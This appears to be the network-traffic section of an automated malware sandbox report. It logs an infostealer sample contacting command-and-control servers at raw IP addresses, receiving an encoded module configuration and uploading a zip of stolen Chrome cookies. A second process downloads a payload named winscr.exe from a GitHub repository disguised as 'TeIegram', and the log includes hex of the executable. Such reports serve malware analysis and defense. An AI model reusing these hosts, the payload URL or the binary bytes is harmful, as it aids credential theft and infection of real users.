                                                                                                                                    Oct 10, 2022 06:01:56.610060930 CEST14INData Raw: 8c 24 6a 6d 00 00 c7 84 24 a0 da 00 00 00 00 00 00 c7 84 24 b0 da 00 00 00 00 00 00 8d 51 01 c7 84 24 b4 da 00 00 0f 00 00 00 8a 01 41 84 c0 75 f9 2b ca 8d 84 24 6a 6d 00 00 51 50 8d 8c 24 a8 da 00 00 e8 db 63 03 00 b9 19 00 00 00 8d bc 24 b7 22
                                                                                                                                    Data Ascii: $jm$$Q$Au+$jmQP$c$"X'3=*T$fV(@_)(%])(_)(5p^)fn)D$L$fnffffnBfpf((fjfbf8(f8(ff(fff
                                                                                                                                    Oct 10, 2022 06:01:56.610100985 CEST15INData Raw: 66 0f 6e c1 66 0f fc c8 66 0f 6e 84 14 ef 5f 00 00 66 0f ef c8 66 0f 6e c0 66 0f 70 d0 00 66 0f 7e 8c 14 ef 5f 00 00 66 0f fe d4 0f 28 ca 0f 28 c2 66 0f 62 ca 66 0f 6a c2 66 0f 38 28 c3 66 0f 38 28 cb 0f c6 c8 dd 66 0f fe ca 66 0f e2 cd 0f 28 c1
                                                                                                                                    Data Ascii: fnffn_ffnfpf~_f((fbfjf8(f8(ff(fff8@fppfpf^)fgfnffn_ff~_pT$s}7=T$T$k:*80_BT$s|$_$
                                                                                                                                    Oct 10, 2022 06:01:56.671849012 CEST16INData Raw: 84 c0 75 f9 2b ca 8d 84 24 e3 40 00 00 51 50 8d 8c 24 20 db 00 00 e8 fc 59 03 00 b9 1c 00 00 00 8d bc 24 62 60 00 00 be d8 ed 27 10 33 d2 83 3d e0 a7 2a 10 02 f3 a5 89 54 24 0c 66 a5 a4 0f 8c 53 01 00 00 0f 28 05 40 5f 29 10 b8 05 00 00 00 0f 28
                                                                                                                                    Data Ascii: u+$@QP$ Y$b`'3=*T$fS(@_)(%])(_)(5p^)fn)D$L$fnfnBfpf((fjfbf8(f8(ff(fff8@fppfpf^)fgfnffnb`f


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    4192.168.2.34969377.73.133.5380C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 10, 2022 06:01:57.860542059 CEST3032OUTGET /cloud/index.php HTTP/1.1
                                                                                                                                    Host: 77.73.133.53
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27
                                                                                                                                    Accept: */*
                                                                                                                                    Cookie: PHPSESSID=ZrOP1CNQKIVeL1ZP
                                                                                                                                    Oct 10, 2022 06:01:57.884048939 CEST3033INHTTP/1.1 200 OK
                                                                                                                                    Date: Mon, 10 Oct 2022 04:01:57 GMT
                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Length: 857
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Data Raw: 7b 22 61 22 3a 22 46 34 30 42 39 31 46 33 31 44 32 42 39 46 39 36 44 44 38 36 46 46 42 44 34 32 41 36 45 45 45 43 43 37 46 43 42 39 34 31 33 35 36 34 33 36 42 35 42 39 31 36 41 41 39 31 34 34 37 44 30 46 43 37 22 2c 22 73 75 62 73 63 72 69 70 74 69 6f 6e 22 3a 22 41 32 41 32 45 32 31 42 43 44 31 36 46 31 46 46 37 34 46 34 46 30 37 42 45 34 32 41 36 43 31 45 22 2c 22 73 7a 22 3a 22 36 33 31 44 30 37 34 33 44 46 31 38 35 32 45 44 39 36 33 46 38 33 39 41 34 30 30 32 39 43 30 38 22 2c 22 74 69 6d 65 22 3a 22 31 36 36 30 30 38 35 34 39 38 22 2c 22 61 63 63 65 73 73 22 3a 22 32 43 41 38 34 46 35 44 44 39 35 30 38 30 34 42 31 32 43 31 30 42 32 44 44 45 46 30 43 42 36 45 22 2c 22 62 22 3a 22 33 30 32 35 36 44 36 34 33 44 32 46 46 45 36 37 42 43 32 43 37 39 37 46 39 39 42 44 42 32 33 32 37 41 33 32 38 44 31 42 33 36 37 45 41 38 45 32 34 39 30 37 38 44 43 32 32 32 36 46 36 44 34 31 34 30 36 32 35 45 45 36 44 42 41 35 35 42 37 44 30 32 44 36 30 34 42 43 46 46 31 36 39 38 46 35 31 33 46 42 37 34 33 46 35 34 33 38 36 30 37 31 36 46 33 37 34 30 44 35 41 35 43 33 43 39 44 33 43 37 46 43 42 39 34 31 33 35 36 34 33 36 42 35 42 39 31 36 41 41 39 31 34 34 37 44 30 46 43 37 22 2c 22 68 22 3a 22 46 30 32 34 43 34 33 43 36 31 37 43 30 30 42 35 45 34 32 39 45 38 33 34 45 38 38 45 30 44 44 31 44 46 42 41 38 43 31 39 46 38 45 34 36 32 35 43 42 36 42 31 44 38 39 41 31 45 38 45 33 33 46 32 22 2c 22 6d 65 74 61 22 3a 7b 22 63 22 3a 22 41 43 37 39 32 42 30 37 35 33 45 37 46 37 37 34 45 37 35 36 36 43 44 33 31 37 45 44 34 46 34 35 43 45 30 37 30 36 34 41 44 44 30 41 32 44 38 41 37 37 31 41 35 39 38 41 43 46 33 46 41 44 34 38 43 37 46 43 42 39 34 31 33 35 36 34 33 36 42 35 42 39 31 36 41 41 39 31 34 34 37 44 30 46 43 37 22 2c 22 64 22 3a 22 41 34 36 37 31 43 45 44 42 31 41 39 46 43 33 32 37 31 44 42 36 44 32 31 45 41 45 44 36 42 34 36 35 35 30 35 42 43 34 32 37 37 39 46 44 38 45 44 34 41 35 46 45 34 35 42 42 41 30 30 36 32 41 44 43 37 46 43 42 39 34 31 33 35 36 34 33 36 42 35 42 39 31 36 41 41 39 31 34 34 37 44 30 46 43 37 22 2c 22 6c 69 63 65 6e 73 65 22 3a 22 45 39 46 35 41 37 46 43 44 46 35 32 34 42 33 39 39 46 36 41 39 41 35 46 39 46 31 43 30 30 44 36 22 2c 22 76 65 72 69 66 69 65 64 22 3a 22 45 39 46 35 41 37 46 43 44 46 35 32 34 42 33 39 39 46 36 41 39 41 35 46 39 46 31 43 30 30 44 36 22 2c 22 62 61 6e 6e 65 64 22 3a 22 32 33 31 36 35 37 43 46 32 34 44 43 32 45 38 37 45 31 45 35 36 37 39 39 44 41 38 38 36 35 39 44 22 2c 22 61 64 6d 69 6e 22 3a 22 32 33 31 36 35 37 43 46 32 34 44 43 32 45 38 37 45 31 45 35 36 37 39 39 44 41 38 38 36 35 39 44 22 7d 7d
                                                                                                                                    Data Ascii: {"a":"F40B91F31D2B9F96DD86FFBD42A6EEECC7FCB941356436B5B916AA91447D0FC7","subscription":"A2A2E21BCD16F1FF74F4F07BE42A6C1E","sz":"631D0743DF1852ED963F839A40029C08","time":"1660085498","access":"2CA84F5DD950804B12C10B2DDEF0CB6E","b":"30256D643D2FFE67BC2C797F99BDB2327A328D1B367EA8E249078DC2226F6D4140625EE6DBA55B7D02D604BCFF1698F513FB743F543860716F3740D5A5C3C9D3C7FCB941356436B5B916AA91447D0FC7","h":"F024C43C617C00B5E429E834E88E0DD1DFBA8C19F8E4625CB6B1D89A1E8E33F2","meta":{"c":"AC792B0753E7F774E7566CD317ED4F45CE07064ADD0A2D8A771A598ACF3FAD48C7FCB941356436B5B916AA91447D0FC7","d":"A4671CEDB1A9FC3271DB6D21EAED6B465505BC42779FD8ED4A5FE45BBA0062ADC7FCB941356436B5B916AA91447D0FC7","license":"E9F5A7FCDF524B399F6A9A5F9F1C00D6","verified":"E9F5A7FCDF524B399F6A9A5F9F1C00D6","banned":"231657CF24DC2E87E1E56799DA88659D","admin":"231657CF24DC2E87E1E56799DA88659D"}}


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    5192.168.2.349694194.190.152.19480C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 10, 2022 06:01:57.946506023 CEST3034OUTGET /gate.php HTTP/1.1
                                                                                                                                    Host: 194.190.152.194
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27
                                                                                                                                    Accept: */*
                                                                                                                                    Oct 10, 2022 06:01:58.008771896 CEST3035INHTTP/1.1 200 OK
                                                                                                                                    Date: Mon, 10 Oct 2022 04:01:57 GMT
                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                    Set-Cookie: PHPSESSID=9eeud2t3rfr8ge5vt3gkk9ssg5; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Content-Length: 633
                                                                                                                                    Content-Type: application/json; charset=utf-8', true,200
                                                                                                                                    Data Raw: 7b 22 6b 22 3a 22 6d 68 5a 47 4d 72 58 34 6e 30 47 39 67 4c 4e 52 41 38 44 52 6b 73 6f 59 30 4f 6c 62 6f 41 4e 34 22 2c 22 72 65 72 5f 6d 6f 64 75 6c 65 22 3a 22 41 59 42 72 6e 35 6a 78 5c 2f 6d 42 55 58 56 61 72 33 41 6b 42 55 51 3d 3d 22 2c 22 72 65 72 5f 64 69 72 65 63 74 5f 6c 69 6e 6b 22 3a 22 6f 44 33 45 6a 6c 5c 2f 77 68 4d 76 34 43 61 61 76 5a 6b 6f 71 64 53 63 6c 6a 41 70 6c 52 76 78 77 2b 52 42 4f 32 70 69 77 34 70 41 5a 5a 6b 7a 71 38 42 43 44 35 65 33 76 46 76 68 49 69 71 66 51 30 69 47 45 6b 38 75 4a 61 57 71 30 31 50 75 42 6a 45 72 78 37 51 3d 3d 22 2c 22 72 65 72 5f 74 79 70 65 22 3a 22 6b 41 41 6c 6e 6c 4a 73 66 50 2b 62 4e 30 59 57 6e 64 54 6a 30 77 3d 3d 22 2c 22 66 65 6d 5f 6d 6f 64 75 6c 65 22 3a 22 63 4a 31 30 66 43 6a 34 70 61 78 69 6f 5c 2f 34 7a 51 7a 51 6c 42 41 3d 3d 22 2c 22 66 65 6d 5f 68 65 61 64 65 72 22 3a 22 5a 31 31 54 57 35 51 45 57 76 57 63 51 67 75 5c 2f 4a 38 4a 31 61 51 3d 3d 22 2c 22 66 65 6d 5f 62 6f 64 79 22 3a 22 63 6a 43 53 69 34 58 52 42 46 54 34 54 37 6c 4f 78 5a 2b 77 35 77 3d 3d 22 2c 22 66 67 5f 6d 6f 64 75 6c 65 22 3a 22 41 59 42 72 6e 35 6a 78 5c 2f 6d 42 55 58 56 61 72 33 41 6b 42 55 51 3d 3d 22 2c 22 66 67 5f 64 69 72 73 22 3a 22 63 4f 2b 49 54 32 75 4f 37 76 53 72 78 54 6d 73 42 4c 5c 2f 31 76 75 6f 30 31 59 4b 70 4d 56 67 35 6f 79 53 4f 50 77 42 4f 6a 30 67 3d 22 2c 22 66 67 5f 65 78 74 22 3a 22 36 50 43 33 43 33 62 6b 63 6b 6a 66 56 52 41 66 59 67 6c 6d 63 35 4a 6b 4e 59 4a 4a 55 36 48 50 56 51 49 6f 51 4c 69 7a 6e 63 59 3d 22 2c 22 73 65 6c 66 5f 6b 69 6c 6c 22 3a 22 63 4a 31 30 66 43 6a 34 70 61 78 69 6f 5c 2f 34 7a 51 7a 51 6c 42 41 3d 3d 22 2c 22 6d 6f 7a 69 6c 6c 61 5f 6d 6f 64 75 6c 65 73 22 3a 22 63 4a 31 30 66 43 6a 34 70 61 78 69 6f 5c 2f 34 7a 51 7a 51 6c 42 41 3d 3d 22 2c 22 61 6e 74 69 5f 76 6d 5f 73 63 6f 72 65 22 3a 22 63 4a 31 30 66 43 6a 34 70 61 78 69 6f 5c 2f 34 7a 51 7a 51 6c 42 41 3d 3d 22 7d
                                                                                                                                    Data Ascii: {"k":"mhZGMrX4n0G9gLNRA8DRksoY0OlboAN4","rer_module":"AYBrn5jx\/mBUXVar3AkBUQ==","rer_direct_link":"oD3Ejl\/whMv4CaavZkoqdScljAplRvxw+RBO2piw4pAZZkzq8BCD5e3vFvhIiqfQ0iGEk8uJaWq01PuBjErx7Q==","rer_type":"kAAlnlJsfP+bN0YWndTj0w==","fem_module":"cJ10fCj4paxio\/4zQzQlBA==","fem_header":"Z11TW5QEWvWcQgu\/J8J1aQ==","fem_body":"cjCSi4XRBFT4T7lOxZ+w5w==","fg_module":"AYBrn5jx\/mBUXVar3AkBUQ==","fg_dirs":"cO+IT2uO7vSrxTmsBL\/1vuo01YKpMVg5oySOPwBOj0g=","fg_ext":"6PC3C3bkckjfVRAfYglmc5JkNYJJU6HPVQIoQLizncY=","self_kill":"cJ10fCj4paxio\/4zQzQlBA==","mozilla_modules":"cJ10fCj4paxio\/4zQzQlBA==","anti_vm_score":"cJ10fCj4paxio\/4zQzQlBA=="}


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    6192.168.2.349695194.190.152.19480C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 10, 2022 06:02:03.227725983 CEST3036OUTPOST /gate.php HTTP/1.1
                                                                                                                                    Host: 194.190.152.194
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Length: 83404
                                                                                                                                    Content-Type: multipart/form-data; boundary=------------------------f057a9d3d4e5d9b5
                                                                                                                                    Oct 10, 2022 06:02:03.228060007 CEST3048OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 30 35 37 61 39 64 33 64 34 65 35 64 39 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                                                                                                                                    Data Ascii: --------------------------f057a9d3d4e5d9b5Content-Disposition: form-data; name="img"; filename="image"Content-Type: application/octet-streamPKN0JU+Browsers\Cookies\Chrome_Default_Network.txtT@]w%)_4,Z
                                                                                                                                    Oct 10, 2022 06:02:03.290529966 CEST3052OUTData Raw: 6d 75 89 76 a0 a8 3e 4b a7 06 c1 6c 66 33 22 12 17 34 a0 20 2e a0 28 71 ac 38 28 71 36 12 f4 d3 68 03 9a a2 c1 a9 09 f6 83 0e 53 9f 31 37 b1 5f af 95 16 59 38 25 51 6e b8 75 22 6b cb e2 b8 7d 51 45 8a c8 5f f2 70 ea 97 48 d4 62 23 ab 7e 8d 8f c9
                                                                                                                                    Data Ascii: muv>Klf3"4 .(q8(q6hS17_Y8%Qnu"k}QE_pHb#~9TgkuXINg+O9)7IPu\v[;ENj~MlO*],d4TP1TGvk ]t`vL\|$|[vwxWz_gS?T@,7A[I:{f
                                                                                                                                    Oct 10, 2022 06:02:03.290530920 CEST3059OUTData Raw: ce 90 93 19 bf 56 56 fe a2 0f 27 51 7c 14 b9 c9 db 7d dc 00 76 f2 42 37 9e cf 3c 9c 31 e9 8c a2 9d 8e c4 11 45 d1 b1 55 e1 17 fb 29 13 b2 8f 58 1e 6a 55 54 5b 6b f5 cb 96 e9 97 51 01 d7 e7 67 eb 52 66 25 05 e7 94 e3 98 b6 2b 63 64 c2 4e f6 cd 29
                                                                                                                                    Data Ascii: VV'Q|}vB7<1EU)XjUT[kQgRf%+cdN)c>/9<7#QE=Nvi9Ba}wtBdah+]g9n K"v4D1yLT=3X;1UsCEY8;\>|7;g:v
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST3062OUTData Raw: 7a 01 a5 30 d0 0b 75 90 37 04 2c 65 a5 4f 95 43 52 ea 0c 54 c3 4d f5 9d a3 e1 c2 b4 19 91 40 1a b0 38 35 c3 22 83 5e 89 da 1d 81 42 8d 60 06 e7 60 10 1d d0 f0 97 08 34 68 b8 4b 40 9c c2 40 4a 9e 13 18 f5 90 67 a8 ed 18 ba 84 81 d8 70 3d 91 d8 8b
                                                                                                                                    Data Ascii: z0u7,eOCRTM@85"^B``4hK@@Jgp=p>A;h$:0kt#r3%0xhIfuUJftP<89]-Ef3>zW"I%_8OL&f7>
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST3067OUTData Raw: d8 fe 62 36 fc cb 6d 7e fd 5a 68 cf 7c 55 e8 57 8d d0 63 b6 91 15 87 d4 e5 91 52 01 c5 3b 04 33 df 48 49 c2 39 b0 4f 39 db 0e 0c 1c 72 63 3e 8a 5a da f4 2f f8 aa 94 9c 96 11 91 43 31 93 d2 94 e7 f7 1b 1c ed 72 16 4d 39 81 f1 e8 31 09 70 fc 6a 34
                                                                                                                                    Data Ascii: b6m~Zh|UWcR;3HI9O9rc>Z/C1rM91pj4j!,g5=UA38^V@Z(L}'c\X^j.N'!_G$7&H`N< &y^/a<E6rB)BrM8t<rW
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST3070OUTData Raw: d0 e5 f5 df 68 bb 38 e3 16 05 9c 28 9a de 1b 93 41 48 c5 f1 86 35 4e 48 41 bb 81 80 0c 7c b7 b8 70 81 04 37 70 5a 18 5f ac 43 8d bf e6 12 f3 d0 2e ac 5d b4 39 f4 0a 1a 8b fb 06 3a e2 3f 26 b7 b1 73 8a 3c d9 34 ab 4c 9c 7a 5c 33 a5 5d 67 5b 68 0c
                                                                                                                                    Data Ascii: h8(AH5NHA|p7pZ_C.]9:?&s<4Lz\3]g[h/s//Kx-i+_~[S9_V|giz]MZ(-_ /!=maUAu`k V\5!!YA*O}<>/[~E~WbGP}F*
                                                                                                                                    Oct 10, 2022 06:02:03.290760994 CEST3072OUTData Raw: 72 bb 65 e2 b2 c6 87 7b 70 d9 b2 ed 60 d2 08 f5 13 3e b4 70 0a b0 78 74 76 c6 aa 55 c2 95 f3 0a 87 ac ac f9 44 ae fb 40 7e cf 17 e7 a5 a8 7e 9e 2f 7e 4d 6d 23 d6 f6 9b 55 2e b7 10 5d cf fd e4 d4 cc b2 f6 9d 7a 0f e6 b8 ba cf 3c 6a 8b a2 63 f9 6e
                                                                                                                                    Data Ascii: re{p`>pxtvUD@~~/~Mm#U.]z<jcn:wX?64-Y_R~&}2iyC()`>VM[hr;+6xgGn13XV7"#Y^U}KHl7")%9
                                                                                                                                    Oct 10, 2022 06:02:03.353419065 CEST3088OUTData Raw: 02 2f 92 aa 05 88 7e c4 31 fd cc ed e3 a2 90 b5 f1 f4 27 70 96 dc 86 28 9c 13 e5 25 0e ec da db 15 46 03 46 1a 68 d3 09 3f 6a c8 ff 03 da 49 d3 21 83 14 a3 5f 48 e7 e9 77 e7 b0 b8 e9 b1 45 16 d1 5e d4 fd 90 7d b6 ed 10 a1 6f 68 14 11 54 64 41 5a
                                                                                                                                    Data Ascii: /~1'p(%FFh?jI!_HwE^}ohTdAZIB~%cEppAv};6jQ-D6H6Q2k!b{^M`B(+ y.pnQs(%%sC!S^&q}z6gg-m7MUa.:+Vg4^
                                                                                                                                    Oct 10, 2022 06:02:03.353595018 CEST3090OUTData Raw: 30 0f c1 aa de 85 36 7a 5f d6 39 17 be 78 f2 73 d0 50 d7 48 a1 75 01 1b 14 76 e9 6c ca df 6f 13 43 75 8c 78 d1 9e 3b d9 be 30 35 f1 b1 31 c3 22 47 89 5a 7b 89 b7 22 e5 1e 8f 62 4f 44 58 05 a9 7d 1f 2c 43 e4 9b fc b2 89 d8 33 71 92 5e 92 de 3d e0
                                                                                                                                    Data Ascii: 06z_9xsPHuvloCux;051"GZ{"bODX},C3q^=]EP_jG["ow["5;6=Oe]z`-q1@tH?t_;8 '%RW`Xh9+GpW13`FJ9G1iG
                                                                                                                                    Oct 10, 2022 06:02:03.353889942 CEST3095OUTData Raw: 7f b6 13 1d 34 35 c0 30 93 a5 a8 04 93 d7 1c 1b a0 2d 14 ae a1 60 c6 7a a9 ce 19 d3 54 3c d4 ed f6 6b e7 88 29 8b 0f 65 91 a5 4f 78 4e 92 bb 14 4c 79 78 97 cc 3f 91 8a 6e 74 75 c8 b8 5d 41 a8 be 91 e4 81 09 48 18 70 41 5b 71 11 5d 67 0e 17 c1 8f
                                                                                                                                    Data Ascii: 450-`zT<k)eOxNLyx?ntu]AHpA[q]g4_b\V[q@\p=bxw gwS*]{c8\L0j pvgy'd"q%OqK.sEJz>:w==urI4(s
                                                                                                                                    Oct 10, 2022 06:02:04.325439930 CEST3121INHTTP/1.1 200 OK
                                                                                                                                    Date: Mon, 10 Oct 2022 04:02:03 GMT
                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                    Set-Cookie: PHPSESSID=ac6kfdeoha286j8qq1o930qe8v; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Content-Length: 0
                                                                                                                                    Content-Type: application/json; charset=utf-8', true,200


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.349698140.82.121.3443C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2022-10-10 04:02:13 UTC0OUTGET /lakrica0/TeIegram/raw/main/winscr.exe HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                    Host: github.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2022-10-10 04:02:13 UTC0INHTTP/1.1 302 Found
                                                                                                                                    Server: GitHub.com
                                                                                                                                    Date: Mon, 10 Oct 2022 04:02:13 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                    Location: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                    X-Frame-Options: deny
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                    2022-10-10 04:02:13 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.349699185.199.108.133443C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2022-10-10 04:02:14 UTC2OUTGET /lakrica0/TeIegram/main/winscr.exe HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                    2022-10-10 04:02:14 UTC2INHTTP/1.1 200 OK
                                                                                                                                    Connection: close
                                                                                                                                    Content-Length: 192000
                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    ETag: "49e3fed3d1847f0f4d52e3779df2f634e99d94c1b028fcbc39717344bdc11381"
                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-Frame-Options: deny
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    X-GitHub-Request-Id: 094A:0EEE:62599D:69D413:63439946
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Date: Mon, 10 Oct 2022 04:02:14 GMT
                                                                                                                                    Via: 1.1 varnish
                                                                                                                                    X-Served-By: cache-mxp6975-MXP
                                                                                                                                    X-Cache: MISS
                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                    X-Timer: S1665374534.113763,VS0,VE194
                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    X-Fastly-Request-ID: c632cd803a7e2b2abbf0395e7dda59c371ac17a7
                                                                                                                                    Expires: Mon, 10 Oct 2022 04:07:14 GMT
                                                                                                                                    Source-Age: 0
                                                                                                                                    2022-10-10 04:02:14 UTC3INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 66 69 66 34 22 08 08 67 22 08 08 67 22 08 08 67 96 94 f9 67 29 08 08 67 96 94 fb 67 b3 08 08 67 96 94 fa 67 3a 08 08 67 71 2b 11 67 20 08 08 67 6f 2b 15 67 23 08 08 67 bc a8 cf 67 23 08 08 67 70 60 0c 66 33 08 08 67 70 60 0b 66 35 08 08 67 70 60 0d 66 0b 08 08 67 2b 70 9b 67 2b 08 08 67 22 08 09 67 8f 08 08 67 87 61 01 66 2b 08 08 67 87 61 f7 67 23 08 08 67 87 61 0a 66 23 08 08
                                                                                                                                    Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$fif4"g"g"gg)gggg:gq+g go+g#gg#gp`f3gp`f5gp`fg+pg+g"ggaf+gag#gaf#
                                                                                                                                    2022-10-10 04:02:14 UTC19INData Raw: 0d 00 00 00 00 5b c9 c3 c3 56 be 50 fa 42 00 8b ce e8 3f 00 00 00 8b 54 24 08 3b c2 76 12 8b ce e8 20 00 00 00 6b ca 18 5e 03 08 8b c1 c2 04 00 e8 15 00 00 00 cc e8 62 dd ff ff 8b c8 e8 76 dd ff ff c2 04 00 e9 53 dd ff ff 68 4c a0 42 00 e8 59 4a 00 00 cc e8 14 00 00 00 8b d0 e8 e4 ff ff ff 8b 0a 6a 18 2b 08 8b c1 99 59 f7 f9 c3 e8 2a dd ff ff 83 c0 04 c3 b8 de 34 42 00 e8 f3 e4 01 00 81 ec 98 00 00 00 53 56 57 6a 2c 8b f2 8b f9 e8 74 ff ff ff 8b c8 e8 92 db ff ff 50 8d 4d 90 e8 3c db ff ff 83 65 fc 00 8d 4d c0 bb 68 a0 42 00 50 8b d3 e8 b3 e5 ff ff 59 8d 4d 90 c6 45 fc 02 e8 8f da ff ff 53 8d 55 c0 8d 8d 60 ff ff ff e8 01 e5 ff ff c6 45 fc 03 8d 8d 78 ff ff ff 8b d0 c7 04 24 5c fa 42 00 e8 bd e6 ff ff 53 8b d0 c6 45 fc 04 8d 4d d8 e8 b2 e4 ff ff 59 59 8d
                                                                                                                                    Data Ascii: [VPB?T$;v k^bvShLBYJj+Y*4BSVWj,tPM<eMhBPYMESU`Ex$\BSEMYY
